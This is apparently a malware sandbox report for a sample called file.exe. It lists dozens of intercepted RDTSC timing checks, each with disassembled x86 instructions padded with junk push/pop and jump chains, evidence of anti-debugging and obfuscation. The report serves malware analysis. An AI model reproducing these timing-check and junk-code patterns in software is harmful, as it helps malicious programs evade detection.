Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A2D6D second address: 12A2D81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60510h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A5D42 second address: 12A5D63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9275007h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A5D63 second address: 12A5D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A5BD1 second address: 12A5BDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A5BDF second address: 12A5BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A5BE6 second address: 12A5BEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A5BEB second address: 12A5BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A8232 second address: 12A8251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D9275009h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B6C15 second address: 12B6C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BAC74 second address: 12BAC93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D9275006h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BAC93 second address: 12BACA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D8D6050Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BACA3 second address: 12BACA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BACA7 second address: 12BACC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D8D60512h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F76D8D60506h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C76C3 second address: 11C76D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F76D9274FF6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C76D0 second address: 11C76D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BEE54 second address: 12BEE63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 je 00007F76D9274FFEh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BEE63 second address: 12BEE84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jns 00007F76D8D60506h 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F76D8D60506h 0x00000016 jmp 00007F76D8D6050Bh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BEE84 second address: 12BEEA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F76D9274FFEh 0x0000000e jg 00007F76D9274FFCh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BEEA7 second address: 12BEEAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BEEAD second address: 12BEEB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BF044 second address: 12BF04A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BF181 second address: 12BF19C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9274FFBh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F76D9274FF6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BF19C second address: 12BF1A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C03CE second address: 12C03D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C03D6 second address: 12C03F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F76D8D6050Dh 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C1E71 second address: 12C1E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C1E75 second address: 12C1E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D8D60518h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F76D8D60506h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C1E9D second address: 12C1EAC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F76D9274FF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C7C3B second address: 12C7C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CBD8A second address: 12CBD8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D3C20 second address: 12D3C2A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F76D8D60506h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D3C2A second address: 12D3C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F76D9275006h 0x0000000c jmp 00007F76D9275006h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jmp 00007F76D9275002h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E37AD second address: 12E37BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D8D6050Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E37BE second address: 12E37D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9274FFDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E6009 second address: 12E6013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F76D8D60506h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E6013 second address: 12E6036 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F76D9274FF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F76D9275007h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E6036 second address: 12E603A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FE011 second address: 12FE042 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9275009h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F76D9275002h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FE042 second address: 12FE048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FE771 second address: 12FE782 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F76D9274FF6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FE782 second address: 12FE79E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60518h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FEBB7 second address: 12FEBCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76D9275002h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1305BEB second address: 1305BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1305BEF second address: 1305BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1305EE3 second address: 1305F06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60513h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F76D8D60508h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1305F06 second address: 1305F0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1305F0C second address: 1305F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121621F second address: 1216224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553031B second address: 553033B instructions: 0x00000000 rdtsc 0x00000002 call 00007F76D8D60518h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553033B second address: 553034A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, ebx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553034A second address: 553034E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553034E second address: 5530354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530354 second address: 553035A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553035A second address: 553035E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553035E second address: 553036F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553036F second address: 5530373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530373 second address: 5530379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530379 second address: 55303C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9275004h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c movzx esi, bx 0x0000000f pushfd 0x00000010 jmp 00007F76D9275003h 0x00000015 jmp 00007F76D9275003h 0x0000001a popfd 0x0000001b popad 0x0000001c mov edx, dword ptr [ebp+0Ch] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55303C9 second address: 55303CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55303CD second address: 55303D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55603F2 second address: 556043C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D6050Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F76D8D6050Bh 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov si, 004Bh 0x00000015 movzx eax, di 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c mov edx, ecx 0x0000001e popad 0x0000001f xchg eax, ecx 0x00000020 jmp 00007F76D8D6050Eh 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F76D8D6050Eh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 556043C second address: 5560442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560442 second address: 5560461 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F76D8D60514h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560461 second address: 5560497 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9274FFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007F76D9275004h 0x00000010 mov di, cx 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F76D9274FFAh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560497 second address: 55604BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 call 00007F76D8D6050Dh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F76D8D6050Ah 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55604BA second address: 556056C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9274FFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-04h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F76D9275004h 0x00000013 add ecx, 5AA2A868h 0x00000019 jmp 00007F76D9274FFBh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F76D9275008h 0x00000025 and si, 7AC8h 0x0000002a jmp 00007F76D9274FFBh 0x0000002f popfd 0x00000030 popad 0x00000031 nop 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F76D9275004h 0x00000039 adc si, FD28h 0x0000003e jmp 00007F76D9274FFBh 0x00000043 popfd 0x00000044 call 00007F76D9275008h 0x00000049 mov si, DD21h 0x0000004d pop esi 0x0000004e popad 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 556056C second address: 5560570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560570 second address: 5560589 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9275005h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560589 second address: 55605A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60511h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ecx, edi 0x0000000f mov bx, C23Ah 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55605A9 second address: 55605D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9275000h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F76D9275007h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 556068C second address: 55606B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60519h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F76D8D6050Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55606B9 second address: 55606BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55606BF second address: 55606C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55606C3 second address: 55606C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55606C7 second address: 5550010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c cmp eax, 00000000h 0x0000000f setne al 0x00000012 xor ebx, ebx 0x00000014 test al, 01h 0x00000016 jne 00007F76D8D60507h 0x00000018 xor eax, eax 0x0000001a sub esp, 08h 0x0000001d mov dword ptr [esp], 00000000h 0x00000024 mov dword ptr [esp+04h], 00000000h 0x0000002c call 00007F76DD279943h 0x00000031 mov edi, edi 0x00000033 pushad 0x00000034 mov si, 18DBh 0x00000038 movzx ecx, bx 0x0000003b popad 0x0000003c push esi 0x0000003d pushad 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5550010 second address: 555005D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F76D9275000h 0x0000000a popad 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007F76D9275000h 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 mov dx, 9120h 0x0000001a popad 0x0000001b push FFFFFFFEh 0x0000001d jmp 00007F76D9274FFFh 0x00000022 push 0F1191FFh 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 555005D second address: 5550061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5550061 second address: 5550067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5550067 second address: 5550081 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76D8D60516h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5550081 second address: 55500F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9274FFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 669D0C49h 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F76D9275004h 0x00000019 and ecx, 3FFAA028h 0x0000001f jmp 00007F76D9274FFBh 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007F76D9275008h 0x0000002b adc ax, 5288h 0x00000030 jmp 00007F76D9274FFBh 0x00000035 popfd 0x00000036 popad 0x00000037 push 168F5517h 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55500F7 second address: 55500FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55500FB second address: 5550101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5550101 second address: 5550191 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60513h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 5F19D659h 0x00000010 jmp 00007F76D8D60516h 0x00000015 mov eax, dword ptr fs:[00000000h] 0x0000001b jmp 00007F76D8D60510h 0x00000020 nop 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F76D8D6050Dh 0x00000028 and ax, 9C66h 0x0000002d jmp 00007F76D8D60511h 0x00000032 popfd 0x00000033 popad 0x00000034 push eax 0x00000035 pushad 0x00000036 mov ebx, 70BAA2A2h 0x0000003b mov bh, 46h 0x0000003d popad 0x0000003e nop 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F76D8D60511h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5550191 second address: 55501A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76D9274FFCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55501A1 second address: 555021C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D6050Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 18h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F76D8D6050Bh 0x00000015 add cl, FFFFFFAEh 0x00000018 jmp 00007F76D8D60519h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F76D8D60513h 0x00000029 add cx, C7BEh 0x0000002e jmp 00007F76D8D60519h 0x00000033 popfd 0x00000034 mov cx, 1107h 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 555021C second address: 55502C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F76D9275003h 0x00000009 adc si, E9CEh 0x0000000e jmp 00007F76D9275009h 0x00000013 popfd 0x00000014 mov ah, 0Fh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007F76D9274FFAh 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F76D9274FFEh 0x00000027 xor cx, A578h 0x0000002c jmp 00007F76D9274FFBh 0x00000031 popfd 0x00000032 pushfd 0x00000033 jmp 00007F76D9275008h 0x00000038 xor ch, FFFFFFD8h 0x0000003b jmp 00007F76D9274FFBh 0x00000040 popfd 0x00000041 popad 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F76D9275005h 0x0000004a rdtsc
